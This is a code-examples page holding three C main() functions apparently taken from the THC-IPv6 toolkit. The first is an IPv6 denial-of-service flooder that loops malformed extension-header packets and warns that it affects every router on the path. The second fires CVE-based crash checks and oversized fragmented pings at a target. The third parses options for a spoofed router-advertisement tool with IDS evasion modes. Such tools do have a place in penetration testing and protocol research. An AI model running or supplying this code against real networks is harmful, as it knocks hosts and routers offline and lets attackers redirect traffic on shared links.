Example #1
0
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[65536], bla[1500], tests[256];
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i, j, k, srcmtu, fragsize;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface, *randptr = NULL;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  interface = argv[1];
  if ((dst6 = thc_resolve6(argv[2])) == NULL) {
    fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
    exit(-1);
  }
  //route6 = thc_resolve6("2a01::");
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface: %s\n", interface);
    exit(-1);
  }
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  fragsize = ((srcmtu - 62) / 8) * 8;

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(buf, 0, sizeof(buf));
  memset(tests, 0, sizeof(tests));
  memset(bla, 0, sizeof(bla));

  if (test < 1 || test > MAX_TEST) {
    printf("%s %s (c) 2014 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
    printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
    printf("The following test cases are currently implemented:\n");
    printf("  1 : large hop-by-hop header with router-alert and filled with unknown options\n");
    printf("  2 : large destination header filled with unknown options\n");
    printf("  3 : hop-by-hop header with router alert option plus 180 headers\n");
    printf("  4 : hop-by-hop header with router alert option plus 178 headers + ping\n");
    printf("  5 : AH header + ping\n");
    printf("  6 : first fragments of a ping with a hop-by-hop header with router alert\n");
    printf("  7 : large hop-by-hop header filled with unknown options (no router alert)\n");
    exit(0);
  }

  printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
  printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");

  /********************** TEST CASE PREPARATION *************************/

  if (test == count) {          // 1432
    printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    j = 4;
    i = 1;
    while (i <= 67) {
      k = (i % 63) + 1;
      buf[j] = k;
      switch (k) {
      case 38:                 // quickstart
        buf[j + 1] = 7;         // length
        buf[j + 2] = 1;         // request type + rate
        buf[j + 3] = 60;        //qs-ttl
        buf[j + 4] = 8;         // nonce
        j += 9;
        break;
      case 4:
        buf[j + 1] = 1;
        j += 3;
        break;
      case 0:
      case 5:
        buf[j] = 1;
        // fall through
      default:
        buf[j + 1] = 4;
        j += 6;
      }
//      j += buf[j + 1] + 2;
      i++;
    }
//    for (i = 1; i < 236; i++) {
//      buf[i * 6 - 2] = (i % 63) + 1;
//      buf[i * 6 - 1] = 4;
//    }
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {          // 1432
    printf("Test %d: large destination header filled with unknown options.\n", count);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    for (i = 1; i < 237; i++) {
      buf[6 + i * 6] = (i % 63) + 1;
      buf[5 + i * 6] = 4;
    }
    if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {
    j = (thc_get_mtu(interface) - 48) / 8;
    if (j < 150 || j > 8000) {
      fprintf(stderr, "Error: invalid MTU on interface\n");
      exit(-1);
    }
    printf("Test %d: hop-by-hop header with router alert option plus %d headers.\n", count, j);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
      return -1;
    memset(buf, 0, 2);
    for (i = 0; i < j; i++)
      if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
        return -1;
//    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {
    j = (thc_get_mtu(interface) - 64) / 8;
    if (j < 150 || j > 8000) {
      fprintf(stderr, "Error: invalid MTU on interface\n");
      exit(-1);
    }
    printf("Test %d: hop-by-hop header with router alert option plus %d headers plus ping.\n", count, j);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 5;
    buf[1] = 2;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
      return -1;
    memset(buf, 0, 2);
    for (i = 0; i < j; i++)
      if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0)
        return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;

  if (test == count) {
    printf("Test %d: AH header plus ping.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6 + 8) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    if (do_hdr_size != 0)
      ipv6->pkt[do_hdr_size + 40 + 1] = 2;
    else
      ipv6->pkt[14 + 40 + 1] = 2;
  }
  count++;

  if (test == count) {
    printf("Test %d: first ping fragment with hop-by-hop and router alert.\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    buf[0] = 5;
    buf[1] = 2;
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0)
      return -1;
    if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, 0xfacebabe + getpid() + count))
      return -1;
    buf[0] = ICMP6_MLD_REPORT;
    buf[1] = 0;
    buf[2] = 0xb0;
    buf[3] = 0x0b;
    if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, buf, 14))
      return -1;
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    if (do_hdr_size != 0)
      randptr = ipv6->pkt + do_hdr_size + 40 + 8 + 4;
    else
      randptr = ipv6->pkt + 14 + 40 + 8 + 4;
  }
  count++;

  if (test == count) {          // 1432
    printf("Test %d: large hop-by-hop header with filled with unknown options (no router alert).\n", count);
    printf("WARNING: this attack affects all routers on the network path to the target!!\n");
    sleep(3);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    j = 0;
    i = 1;
    while (i <= 67) {
      k = (i % 63) + 1;
      buf[j] = k;
      switch (k) {
      case 38:                 // quickstart
        buf[j + 1] = 7;         // length
        buf[j + 2] = 1;         // request type + rate
        buf[j + 3] = 60;        //qs-ttl
        buf[j + 4] = 8;         // nonce
        j += 9;
        break;
      case 4:
        buf[j + 1] = 1;
        j += 3;
        break;
      case 0:
      case 5:
        buf[j] = 1;
        // fall through
      default:
        buf[j + 1] = 4;
        j += 6;
      }
//      j += buf[j + 1] + 2;
      i++;
    }
//    for (i = 1; i < 236; i++) {
//      buf[i * 6 - 2] = (i % 63) + 1;
//      buf[i * 6 - 1] = 4;
//    }
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
  }
  count++;


  if (test == count) { // dummy entry
    // code
    fprintf(stderr, "to implement\n");
    exit(-1);
  }
  count++;


  /******************* END OF TESTCASE PREPARATION **************************/

  count = 0;
  while (1) {
    thc_send_pkt(interface, pkt, &pkt_len);
    usleep(1);
    count++;
    if (randptr != NULL)
      memcpy(randptr, (char*)&count + _TAKE4, 4);
    if (count % 1000 == 0)
      printf(".");
  }

  return 0;
}
Example #2
0
int main(int argc, char *argv[]) {
  int test = 0, count = 1, tmplen;
  unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src ";
  unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
  unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
  thc_ipv6_hdr *hdr;
  int i = 0, j, srcmtu, fragsize, offset = 14;
  pcap_t *p;
  unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
  int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
  char *interface;
  thc_ipv6_hdr *ipv6;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }
  if (strcmp(argv[1], "-p") == 0) {
    noping = 1;
    argv++;
    argc--;
  }
  
  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[1];
  dst6 = thc_resolve6(argv[2]);
  route6 = thc_resolve6("2a01::");
  memcpy(ldst6, dst6, 16);
  memset(ldst6 + 2, 0, 6);
  ldst6[0] = 0xfe;
  ldst6[1] = 0x80;
  mcast6 = thc_resolve6("ff02::1");
  if (argc >= 4)
    test = atoi(argv[3]);
  memset(buf, 0, sizeof(buf));
  memset(null_buffer, 0, sizeof(null_buffer));

  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  strcat(string, thc_ipv62notation(src6));
  strcat(string2, thc_ipv62notation(dst6));
  srcmac = thc_get_own_mac(interface);
  if (rawmode == 0) {
    if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
      fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
      exit(-1);
    }
  } else
    dstmac = null_buffer;
  if ((srcmtu = thc_get_mtu(interface)) <= 0) {
    fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
    exit(-1);
  }
  if (do_hdr_size)
    srcmtu -= (do_hdr_size - 14);
  fragsize = ((srcmtu - 62) / 8) * 8;

  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  setvbuf(stdout, NULL, _IONBF, 0);
  memset(tests, 0, sizeof(tests));

  printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]);
  if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) {
    fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]);
    exit(-1);
  } else
    printf("Test  0: normal ping6\t\t\t\tPASSED - we got a reply\n");

  /********************** TEST CASES ************************/

  if (test == 0 || test == count) {     // 1432
    printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count);
    tmplen = 65864;
    if ((mal = malloc(tmplen)) == NULL)
      return -1;
    memset(mal, count % 256, tmplen);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    // because of the different possible checksum calculations we have to do them all
    hdr->pkt[offset + 40 + 3] = 0xe5;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 2] = 0x98;
    hdr->pkt[offset + 40 + 3] = 0xa4;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 3] = 0xa3;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 2] = 0x84;
    hdr->pkt[offset + 40 + 3] = 0x90;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    hdr->pkt[offset + 40 + 3] = 0x8f;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    free(mal);
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {     // 1432
    printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count);
    tmplen = 65527;
    if ((mal = malloc(tmplen)) == NULL)
      return -1;
    memset(mal, count % 256, tmplen);
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
    if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt;
    if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
      return -1;
    // because of the different possible checksum calculations we have to do them all
    hdr->pkt[offset + 40 + 2] = 0x31;
    hdr->pkt[offset + 40 + 3] = 0x8c;
    thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
    hdr->pkt[offset + 40 + 3] = 0x8a;
    thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
    free(mal);
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
    memset(bla, count % 256, sizeof(bla));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    memset(buf, 0, sizeof(buf));
    buf[6] = 4;                 // 4-7: retrans timer
    // option mtu
    buf[8] = 5;
    buf[9] = 1;
    buf[12] = mtu / 16777216;
    buf[13] = (mtu % 16777216) / 65536;
    buf[14] = (mtu % 65536) / 256;
    buf[15] = mtu % 256;
    // option prefix
    buf[16] = 3;
    buf[17] = 4;
    buf[18] = 128;              // prefix length // BUG IS HERE
    buf[19] = 128 + 64;
    memset(&buf[20], 17, 4);
    memset(&buf[24], 4, 4);
    memcpy(&buf[32], route6, 16);
    i += 28;
    // mac address option
    buf[i++] = 1;
    buf[i++] = 1;
    memcpy(buf + i, srcmac, 6);
    i += 6;
    // default route routing option
    buf[i++] = 0x18;            // routing entry option type
    buf[i++] = 0x03;            // length 3 == 24 bytes
    buf[i++] = 0x00;            // prefix length
    buf[i++] = 0x08;            // priority, highest of course
    i += 2;                     // 52-53 unknown
    buf[i++] = 0x11;            // lifetime, word
    buf[i++] = 0x11;            // lifetime, word
    i += 16;                    // 56-71 address, all zeros for default
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
      return -1;
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    ipv6 = (thc_ipv6_hdr *) pkt;
    thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
    sleep(1);
    thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
    i = 0;
    while (ports[i] != 0) {
      if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
        return -1;
      if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
        return -1;
      if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
        return -1;
      pkt = thc_destroy_packet(pkt);
      pkt_len = 0;
      i++;
    }
  }
  count++;

/*
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;

  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count % 256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;
*/
/*
  if (test == 0 || test == count) {
    printf("Test %2d: CVE-20\n", count);
    memset(bla, count%256, sizeof(bla));
    memset(buf, 0, sizeof(buf));
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    buf[0] = 0;
    thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      return -1;
    pkt = thc_destroy_packet(pkt);
  }
  count++;
*/

  // more?

  /******************* END OF TESTCASES ***************************/

  if (noping == 1 || check_alive(p, interface, src6, dst6))
    printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count);
  else
    printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count);

  thc_pcap_close(p);

  return 0;
}
Example #3
0
int main(int argc, char *argv[]) {
  char *interface, mac[16] = "", dmac[16] = "";
  unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
  unsigned char *pkt = NULL, *searchlist = NULL;
  int pkt_len = 0;
  pcap_t *p;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  memset(rbuf, 0, sizeof(rbuf));
  memset(mac, 0, sizeof(mac));

  while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
    switch (i) {
    case 'i':
      interval = atoi(optarg);
      break;
    case 'm':
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
             (unsigned int *) &dmac[5]);
      dstmac = dmac;
      break;
    case 'S':
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
             (unsigned int *) &mac[5]);
      mac6 = mac;
      break;
    case 's':
      if ((ip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);
        exit(-1);
      }
      break;
    case 'M':
      mtu = atoi(optarg);
      if (mtu < 0 || mtu > 65535) {
        fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg);
        exit(-1);
      }
      if (mtu < 1228 || mtu > 1500)
        fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu);
      break;
    case 'n':
      to_send = atoi(optarg);
      if (to_send < 1 || mtu > 255) {
        fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg);
        exit(-1);
      }
      break;
    case 'A':
      if (pcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES);
        exit(-1);
      }
      if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
        fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
        exit(-1);
      }
      *ptr++ = 0;
      if ((size = atoi(ptr)) < 0 && size > 255) {       // yes we allow bad sizes :-)
        fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg);
        exit(-1);
      }
      if (size != 64)
        fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size);
      if (index(optarg, ':') == NULL)
        strcat(optarg, "::");
      if ((routerip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg);
        exit(-1);
      }
      pbuf[pcnt][0] = size % 256;
      memcpy((char *) &pbuf[pcnt][1], routerip6, 16);
      pcnt++;
      break;
    case 'a':
      plife = atoi(optarg);
      break;
    case 'r':
      rlife = atoi(optarg);
      break;
    case 'd':
      dlife = atoi(optarg);
      break;
    case 'l':
      llife = atoi(optarg);
      break;
    case 'T':
      reach = atoi(optarg);
      break;
    case 't':
      trans = atoi(optarg);
      break;
    case 'p':
      if (strncasecmp(optarg, "low", 3) == 0)
        prio = 0;
      else
        if (strncasecmp(optarg, "med", 3) == 0)
          prio = 1;
        else
          if (strncasecmp(optarg, "hi", 2) == 0)
            prio = 2;
          else
            if (strncasecmp(optarg, "res", 3) == 0)
              prio = 3;
            else {
              fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg);
              exit(-1);
            }
      break;
    case 'R':
      if (rcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES);
        exit(-1);
      }
      if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
        fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
        exit(-1);
      }
      *ptr++ = 0;
      if ((size = atoi(ptr)) < 0 && size > 255) {       // yes we allow bad sizes :-)
        fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg);
        exit(-1);
      }
      if (index(optarg, ':') == NULL)
        strcat(optarg, "::");
      if ((routerip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg);
        exit(-1);
      }
      rbuf[rcnt][0] = size % 256;
      memcpy((char *) &rbuf[rcnt][1], routerip6, 16);
      rcnt++;
      break;
    case 'D':
      if (dcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES);
        exit(-1);
      }
      if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg);
        exit(-1);
      }
      break;
    case 'L':
      searchlist = optarg;
      break;
    case 'E':
      if (optarg == NULL) {
        fprintf(stderr, "Error: no option type given for -E\n");
        exit(-1);
      }
      for (j = 0; j < strlen(optarg); j++) {
        switch (optarg[j]) {    // fall through to be fail safe on accidental misuse
        case '0':              // fall through
        case 'O':
          do_overlap = 1;
          break;
        case 'o':
          do_overlap = 2;
          break;
        case '1':              // fall through
        case 'l':              // fall through
        case 'L':
          do_frag++;
          break;
        case 'h':              // fall through
        case 'H':
          do_hop = 1;
          break;
        case 'd':              // fall through
        case 'D':
          do_dst = 1;
          break;
        default:
          fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]);
          exit(-1);
        }
        if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) {
          fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n");
          exit(-1);
        }
      }
      break;
    case 'F':
        ptr = strtok(optarg, ",");
        while (ptr != NULL) {
          if (strncasecmp(ptr, "man", 3) == 0)
            flags = (flags | 128);
          else if (strncasecmp(ptr, "oth", 3) == 0)
            flags = (flags | 64);
          else if (strncasecmp(ptr, "hom", 3) == 0)
            flags = (flags | 32);
          else if (strncasecmp(ptr, "prox", 4) == 0)
            flags = (flags | 4);
          else if (strncasecmp(ptr, "res", 3) == 0)
            flags = (flags | 2);
          else if (strncasecmp(ptr, "unk", 3) == 0)
            flags = (flags | 1);
          else {
            fprintf(stderr, "Error: unknown flag: %s\n", ptr);
            exit(-1);
          }
          ptr = strtok(NULL, ",");
        }
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if ((argc - optind) < 1 || (argc - optind) > 2)
    help(argv[0]);

  if (do_hdr_size)
    myoff = do_hdr_size;
  interface = argv[optind];
  if (argc - optind == 2)
    if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
      exit(-1);
    }
  if (mtu == 0)
    mtu = thc_get_mtu(interface);
  if (mac6 == NULL)
    if ((mac6 = thc_get_own_mac(interface)) == NULL) {
      fprintf(stderr, "Error: invalid interface %s\n", interface);
